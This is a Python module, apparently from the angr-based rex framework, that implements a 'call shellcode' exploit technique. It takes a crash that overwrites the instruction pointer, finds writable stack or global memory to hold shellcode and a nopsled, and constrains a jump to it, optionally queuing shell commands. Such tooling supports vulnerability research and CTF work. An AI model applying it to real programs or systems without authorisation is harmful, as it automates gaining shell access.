import logging

from ... import Vulnerability
from .. import Exploit, CannotExploit
from ..technique import Technique
from ..nopsleds import NopSleds
from ..actions import RexCommandAction

# Logger used throughout the CallShellcode technique below.
l = logging.getLogger("rex.exploit.techniques.call_shellcode")

class CallShellcode(Technique):
    """
    Exploit technique that points the instruction pointer at injected shellcode.

    `apply` tries three placements in order and returns the first one that yields an Exploit:

    1. shellcode written into global data via `_write_executable_global_data`;
    2. shellcode written onto the stack at an absolute address (only attempted when ASLR is disabled), optionally
       preceded by a nopsled;
    3. shellcode read into global data via `_read_in_global_data`.
    """

    name = "call_shellcode"
    applicable_to = ['unix']

    def check(self):
        """
        Decide whether this technique is applicable to the crash.

        :return:    True when the crash overwrites IP (fully or partially) and the stack is executable. Otherwise False,
                    after recording the reason through `check_fail_reason`.
        :rtype:     bool
        """
        # can only exploit ip overwrites
        if not self.crash.one_of([Vulnerability.IP_OVERWRITE, Vulnerability.PARTIAL_IP_OVERWRITE]):
            self.check_fail_reason("Cannot control IP.")
            return False

        if not self._is_stack_executable:
            self.check_fail_reason("Stack is not executable.")
            return False

        return True

    def align_down(self, addr, alignment=None):
        """
        Round `addr` down to a multiple of `alignment`.

        :param int addr:        The address to align.
        :param int alignment:   The alignment; defaults to the architecture's instruction alignment.
        :return:                The largest multiple of `alignment` that is <= `addr`.
        :rtype:                 int
        """
        if alignment is None:
            alignment = self.crash.state.arch.instruction_alignment
        return addr - (addr % alignment)

    def align_up(self, addr, alignment=None):
        """
        Round `addr` up to a multiple of `alignment`.

        :param int addr:        The address to align.
        :param int alignment:   The alignment; defaults to the architecture's instruction alignment.
        :return:                The smallest multiple of `alignment` that is >= `addr`.
        :rtype:                 int
        """
        if alignment is None:
            alignment = self.crash.state.arch.instruction_alignment
        remainder = addr % alignment
        return addr if remainder == 0 else addr + alignment - remainder

    def apply(self, cmd=None, use_nopsled=True, **kwargs): #pylint:disable=arguments-differ
        """
        Build an exploit that transfers control to shellcode.

        :param bytes cmd:           Optional command to send to the spawned shell. A trailing newline is appended when
                                    missing, and an ``exit`` command is queued after it.
        :param bool use_nopsled:    Whether to prepend a nopsled to shellcode placed on the stack.
        :return:                    The first Exploit that any placement strategy produces.
        :raises CannotExploit:      If every strategy fails, including when `_read_in_global_data` cannot be used.
        """
        sp_difference = self._core_sp_difference()

        # try to write shellcode into global memory
        shellcode = self.shellcode.get_default()

        # note that currently we only have /bin/sh shellcode, we need to add interaction with the shell
        # to execute arbitrary command
        if cmd:
            self._queue_shell_command(cmd)

        # try to write to some known memory address
        # 1) find a w+x region we can write to
        # 2) see if we can constrain its value to shellcode and the ip to that address
        # 3) done
        l.debug('try: shellcode in global data')
        for shc_addr, shc_constraint in self._write_executable_global_data(shellcode, alignment=self.crash.state.arch.instruction_alignment):
            l.debug("Attempting to place shellcode @ %s", hex(shc_addr))
            exp = self._attempt_jump([shc_constraint], shc_addr)
            if exp is not None:
                return exp

        # try to see if we can jump directly to the stack; absolute stack addresses are only stable without ASLR
        if not self.crash.aslr:
            exp = self._jump_to_stack_shellcode(shellcode, sp_difference, use_nopsled)
            if exp is not None:
                return exp

        # try to read shellcode into memory into one of the aforementioned addresses
        l.debug("try: read shellcode into global data")
        try:
            shc_addr, shc_constraint = self._read_in_global_data(shellcode)
        except CannotExploit as e:
            raise CannotExploit("[%s] cannot call read (all other call-shellcodes failed)" % self.name) from e

        exp = self._attempt_jump([shc_constraint], shc_addr)
        if exp is not None:
            return exp

        raise CannotExploit("[%s] EVERYTHING FAILED" % self.name)

    def _core_sp_difference(self):
        """
        Return the core-dump SP minus angr's concrete SP, or 0 when it cannot be computed.

        When ASLR is disabled, the stack pointer seen in angr may differ from the one in the real process. The
        difference is only computed when ASLR is off, angr's SP is concrete, and core-dump registers containing the
        architecture's SP register are available.
        """
        if self.crash.aslr or self.crash.state.regs.sp.symbolic or not self.crash.core_registers:
            return 0
        # determine what the stack pointer register is called on this architecture
        sp_reg_name = self.crash.project.arch.get_register_by_name('sp').name
        if sp_reg_name not in self.crash.core_registers:
            return 0
        sp_difference = self.crash.core_registers[sp_reg_name] - \
                        self.crash.state.solver.eval(self.crash.state.regs.sp)
        l.debug("The difference between the stack pointer in the core dump and the stack pointer in angr's "
                "final crashing state is %#x bytes.", sp_difference)
        return sp_difference

    def _queue_shell_command(self, cmd):
        """Append actions that send `cmd` (newline-terminated) and then ``exit`` on the crash's input channel."""
        if not cmd.endswith(b"\n"):
            cmd += b"\n"
        channel_name = self.crash.input_type_to_channel(self.crash.input_type)
        self.crash.actions.append(RexCommandAction(cmd, channel_name=channel_name))
        self.crash.actions.append(RexCommandAction(b"exit\n", channel_name=channel_name))

    def _jump_to_stack_shellcode(self, shellcode, sp_difference, use_nopsled):
        """
        Try to place shellcode (optionally behind a nopsled) on the stack and jump to it at an absolute address.

        Steps:
        1) find stack regions controlled by input (`crash.stack_control`);
        2) keep the sub-buffers that look unconstrained enough to hold the shellcode;
        3) starting from the largest, find an offset where the shellcode can be written;
        4) try jump targets inside the nopsled, starting from its middle.

        :return:    An Exploit, or None if no stack region works.
        """
        l.debug('try: absolute address in stack')
        stack_addrs = self._stack_shellcode_candidates(shellcode)
        word_size = self.crash.state.arch.bits // self.crash.state.arch.byte_width
        alignment = self.crash.state.arch.instruction_alignment

        for root in sorted(stack_addrs, key=stack_addrs.get, reverse=True):
            region_size = stack_addrs[root]
            if region_size < len(shellcode):
                continue

            probed = self._probe_shellcode_offset(root, region_size, shellcode, word_size)
            if probed is None:
                l.debug("Cannot write shellcode in region %#x(%#x bytes). Probe the next region.",
                        root, region_size)
                continue
            offset, sc_constraint = probed
            l.debug("We may write shellcode on the stack at root=%x offset=%x loc=%x", root, offset, root + offset)

            if use_nopsled:
                nopsled_size, nopsled_chunk = self._determine_nopsled_length(stack_addrs, root, offset, shellcode)
            else:
                nopsled_size, nopsled_chunk = 0, None

            if nopsled_size > 0:
                # The sled + shellcode constraint does not depend on the jump target, so build it once.
                works, sc_constraint = self._attempt_write_nopsled(self.crash.state, shellcode, root + offset,
                                                                   nopsled_size, nopsled_chunk)
                if not works:
                    continue
                step = len(nopsled_chunk)
            else:
                # Without a sled the only jump target is the start of the shellcode (relative offset 0).
                step = 1

            # Candidate jump targets are the chunk boundaries inside the sled, relative to root + offset.
            sled_offsets = list(range(0, nopsled_size + 1, step))
            for idx in self._spiral_indices(len(sled_offsets)):
                addr = root + offset + sled_offsets[idx]
                if addr % alignment != 0:
                    continue
                exp = self._attempt_jump([sc_constraint], addr + sp_difference, bypasses_aslr=False)
                if exp is not None:
                    l.info("Got Exploit!")
                    return exp

        return None

    def _stack_shellcode_candidates(self, shellcode):
        """
        Map aligned start addresses of unconstrained stack buffers to their usable length.

        Only buffers that are still at least as long as the shellcode after alignment are kept.
        """
        stack_addrs = {}
        for addr, size in self.crash.stack_control(below_sp=False).items():
            unconstrained_bufs = self._find_unconstrained_memory_buffers(addr, size)
            l.debug("Found %d buffer chunks inside %#x-%#x.", len(unconstrained_bufs), addr, addr+size)
            for buf_addr, buf_size in unconstrained_bufs.items():
                aligned_addr = self.align_up(buf_addr)
                aligned_size = buf_size - (aligned_addr - buf_addr)
                # filter on what remains after alignment, not on the raw size
                if aligned_size >= len(shellcode):
                    stack_addrs[aligned_addr] = aligned_size
        return stack_addrs

    def _probe_shellcode_offset(self, root, region_size, shellcode, word_size):
        """
        Return (offset, constraint) for the first word-aligned offset where the shellcode can be written, or None.

        Offsets are probed linearly from the beginning of the region.
        FIXME: a smarter probing strategy would be preferable.
        """
        # "+ 1" so that shellcode exactly filling the region is still tried at offset 0
        for offset in range(0, region_size - len(shellcode) + 1, word_size):
            sc_data = self.crash.state.memory.load(root + offset, len(shellcode))
            sc_constraint = sc_data == shellcode
            if self.crash.state.solver.satisfiable(extra_constraints=(sc_constraint,)):
                return offset, sc_constraint
        return None

    @staticmethod
    def _spiral_indices(count):
        """Yield 0..count-1 starting from the middle and alternating outward (e.g. 5 -> 2, 1, 3, 0, 4)."""
        cur = count // 2
        for i in range(count):
            if i % 2 == 0:
                cur += i
            else:
                cur -= i
            yield cur

    def _find_unconstrained_memory_buffers(self, addr, size):
        """
        Determine if the memory buffer has enough freedom, i.e., is "unconstrained enough", to store shellcode in the
        future.

        A byte qualifies when its value depends on a variable whose name contains 'aeg_input' and either no `__eq__`
        constraint involves only the byte's variables, or no `__eq__` constraint has the byte itself as its first
        argument. Consecutive qualifying bytes are merged into one buffer.

        :param int addr:    The beginning address of the buffer.
        :param int size:    Maximum size of the buffer.
        :return:            A dict with (root, length) as k-v pairs where each element represents a buffer if we
                            believe the buffer starting from `root` with `length` bytes is "unconstrained enough". If no
                            such buffer can be found, an empty dict is returned.
        :rtype:             dict[int, int]
        """

        buffer_chunks = { }

        def _record_buffer(root, new_addr):
            # start a new chunk at new_addr, or extend the current one by a byte
            if root is None:
                root = new_addr
                buffer_chunks[root] = 1
            else:
                buffer_chunks[root] += 1
            return root

        root = None
        for subaddr in range(addr, addr + size):
            val = self.crash.state.memory.load(subaddr, 1)
            # TODO: This sucks. do a real approximation with something like DVSA.
            if any('aeg_input' in name for name in val.variables):
                if not any(c.op == '__eq__' for c in self.crash.state.solver.constraints if not
                        c.variables - val.variables):
                    # this is the best case: this byte seems entirely unconstrained
                    root = _record_buffer(root, subaddr)
                    continue

                if not any(c.args[0] is val for c in self.crash.state.solver.constraints if c.op == '__eq__'):
                    # this is a looser constraint: there does not exist any constraint that's like the following:
                    #     val == N
                    root = _record_buffer(root, subaddr)
                    continue

            # it is unlikely that the current byte can be part of the shellcode. reset root
            root = None

        return buffer_chunks

    def _determine_nopsled_length(self, stack_addrs, root, offset, shellcode):
        """
        Binary-search the largest nopsled (in bytes) that can precede the shellcode at `root + offset`.

        The search space is 0 .. (bytes left in the region after `offset` and the shellcode). It assumes that if a sled
        of length N is writable, so is every shorter one. On failure the upper bound shrinks by the instruction
        alignment, so the search is coarse on architectures whose alignment is > 1.

        :return:    (nopsled_size, nopsled_chunk). The size is not necessarily a multiple of the chunk length;
                    `_attempt_write_nopsled` rounds it down. Returns (0, None) when no nopsled is known for the
                    architecture.
        """
        nopsled_chunks = NopSleds.get_nopsleds(self.crash.state.arch)
        if not nopsled_chunks:
            l.debug("No nopsled available for this architecture; placing shellcode without a nopsled.")
            return 0, None
        nopsled_chunk = nopsled_chunks[0]  # TODO: use more than one nopsleds

        min_nopsled_size = 0
        max_nopsled_size = stack_addrs[root] - offset - len(shellcode)
        while min_nopsled_size < max_nopsled_size:
            attempt = (min_nopsled_size + max_nopsled_size + 1) // 2
            works, _ = self._attempt_write_nopsled(self.crash.state, shellcode, root + offset, attempt,
                                                   nopsled_chunk)
            if not works:
                # we are trying to write too many. Write less!
                max_nopsled_size = attempt - self.crash.state.arch.instruction_alignment
            else:
                # try to write more?
                min_nopsled_size = attempt

        return min_nopsled_size, nopsled_chunk

    def _attempt_jump(self, constraints, addr, bypasses_nx=False, bypasses_aslr=True):
        """
        Check whether `constraints` together with ``ip == addr`` are satisfiable on the crash state.

        On success the constraints are added permanently to the crash state and an Exploit targeting `addr` is
        returned; otherwise the state is left untouched and None is returned.
        """
        all_constraints = list(constraints) + [self.crash.state.regs.ip == addr]

        if self.crash.state.solver.satisfiable(extra_constraints=all_constraints):
            self.crash.state.solver.add(*all_constraints)
            return Exploit(self.crash, bypasses_aslr=bypasses_aslr, bypasses_nx=bypasses_nx, target_ip=addr)

        return None

    @staticmethod
    def _attempt_write_nopsled(state, shellcode, start, nopsled_size, nopsled_chunk):
        """
        Constrain memory at `start` to hold repeated `nopsled_chunk` followed by `shellcode`.

        The sled length is rounded down to a whole number of chunks.

        :return:    (satisfiable, constraint) -- the constraint is not added to `state`.
        """
        nopsled_count = nopsled_size // len(nopsled_chunk)
        rounded_size = nopsled_count * len(nopsled_chunk)
        sc_data = state.memory.load(start, len(shellcode) + rounded_size)
        sc_constraint = sc_data == nopsled_chunk * nopsled_count + shellcode
        return state.solver.satisfiable(extra_constraints=(sc_constraint,)), sc_constraint
